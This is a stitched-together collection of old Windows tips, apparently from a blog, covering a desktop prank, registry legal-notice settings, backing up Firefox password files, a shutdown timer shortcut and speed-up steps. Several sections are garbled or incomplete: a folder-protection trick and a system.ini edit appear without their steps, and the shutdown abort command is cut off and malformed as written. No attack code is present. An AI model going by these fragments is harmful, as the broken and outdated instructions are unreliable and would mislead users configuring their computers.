1.Take a screen shot of your desktop (by clicking Print Screen SysRq button) and then paste the image to paint and save it as Jpeg image format .

2. Then open the image of your desktop and make it your desktop wallpaper. Now hide all the icons from your desktop

now your folder is protected by everyone
To remove the restrictions, follow these step

If you have multiple users on your computer then you can now display legal notice to every user before they login to your computer. This legal notice will be displayed at every start-up.


Legal Notice

1. Go to Start->Run, type regedit and hit ENTER

2. Navigate to the following key in the registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

\policies\system

On the right side pane look for “legalnoticecaption“, double click on it and enter the desired Legal Notice Caption.

3. Next Step - look for “legalnoticetext” and enter the desired Legal Notice Text which you want to be displayed.

4. After done this just restart your computer and you can see the legal notice information for your computer. This trick works on Windows XP, Vista and Windows 7.

Backing up Saved Passwords:-

-Go to Documents and Settings > USERNAME > Application Data > Mozilla > Firefox > Profiles > soofoegp.default (this name is random)
-Backup files

These files contain data regarding saved passwords. After a reinstall, overwrite these files back to this folder.

This will open system editor window

* Scroll down almost to the end of the file till you find a line called [386enh].
* Press Enter to make one blank line, and in that line type

How to Set a Automatic Shutdown Timer for Computer !

There is no software to install and no tweaks to be made. An automatic shutdown is inbuilt into Windows and ready to be explored. Let’s check out how we can set a timer for automatic shutdown.

Right click on the desktop. Select New â†’ Shortcut.

2. A New Shortcut dialog box will appear.

3.In the location box, this is how you will enter the details: shutdown.exe is for calling the shutdown executable. s is the command for shutdown. f is for performing a forced shutdown. If an application stops responding when shutting down, this command will force shut it. Using this command is not compulsory, but recommended. And next, the t command is for specifying the time the shutdown will take place. After you put the t command give a space and then enter the time in seconds. So in the above example, the computer will be shut down in 6 hours. Let’s put the whole command in one line:shutdown.exe -s -f -t seconds

4. Click next and the shortcut will be created on the desktop. Give it a name and click it whenever you wish to initiate an automatic shutdown. If you want to change the time, right click on the shortcut, select properties and change the time from the dialog that opens.

Tip 1: This command can also be initiated from the Run box or CMD.
Tip 2: If you want to display a message that displays when the countdown is in progress, you can append a c command with a message attached. Like this:
-c Computer is shutting down

Tip 3: If you want to restart the computer instead of shutting it down, replace the s with r. Similarly, if you’d like to logoff, replace s with l.
How to abort Shutdown
If you just woke up from sleep and feel like working on your laptop a bit more, there is no easy way you can abort the shutdown. The cross on the top will not work and you won’t be able to kill the process from task manager. But still there’s a way to stop the timer and stopping the bomb before it blasts.

1. Click the WinKey + R
2. The run dialog box will appear. Type shutdown.exe a

How to Increase Startup and Computer Speed !

1 REMOVE ALL THE JUNK

Freeing up disk space is the first and most important step in speeding up your computer.
Remove all the Temporary Internet files, empty recycle bin, windows temporary files and unused or rarely used applications.
Every time you visit a website, the internet browser stores all the cache data which accumulates over a period of time and occupies a significant amount of hard disk space.

As shown in the image, I do not usually keep any pages in my history and delete all the offline content regularly to clear stored data.

2 DISK CLEANUP

This is one good method to free some disk space. It is built in Windows XP and easy to use.
Click on Start >> Programs >> Accessories >> System Tools >> Disk Cleanup
Choose the files to delete and then click OK.
I usually choose to delete the Temporary internet files, Old Chkdsk files and Temporary files.

3 UNINSTALL PROGRAMS

Go to Start >> Control Panel >> Add or Remove Programs
Check all the installed programs and view their Status. Of a particular application displays Used : Rarely, then it is a good idea to remove it. This will free up a lot of disk space as well as speed up your computer.

4 DISK DEFRAGMENTATION

It is a good idea to defragment your hard drive at least once every month. Over a period of time after you install and uninstall applications, the fragmented files are put together when you try to open a file which takes a long time.
Windows has a tool which allows you to defragment all the files on hard drive so that they occupy a particular space and are lot faster to access and open and modify.
To run defragmenter, go to Start >> All Programs >> Accessories >> System Tools >> Disk Defragmenter
Click "Analyze" in order to determine if you need to defragment a particular drive and estimated time required.
Click "Defragment" to start the defragmentation process.
This normally takes a long time so I would recommend doing this when you do not need to work on your computer for 1-2 hours.

5 SPEED UP STARTUP

Stop loading unnecessary programs on Windows Startup. You can go to Start >> All Programs >> Startup and delete any unwanted programs from here. This will only delete the startup functionality of the program and will NOT delete it from your hard drive.
It is a good idea to restart your computer after this step.

6 CONFIGURE WINDOWS STARTUP - 1

I love this step. This is where the majority of the problem lies.
Go to Start >> Run...
In the run window, enter "msconfig" (without quotes) and hit enter.
You need to be very careful while performing this step. Go to "Startup" tab and deselect the programs that you do not want to start at windows startup.
Once you are satisfied with your selections, click "Apply".

7 CONFIGURE WINDOWS STARTUP - 2

Go to "Services" Tab on the the menu and deselect services which you do not want to start during windows start up. Click "Apply".
Go to the "BOOT.INI" Tab and in the Boot options, select " /NOGUIBOOT " and "Apply" This will not display the starting Windows logo. This step saves lot of resources and time taken to start windows.
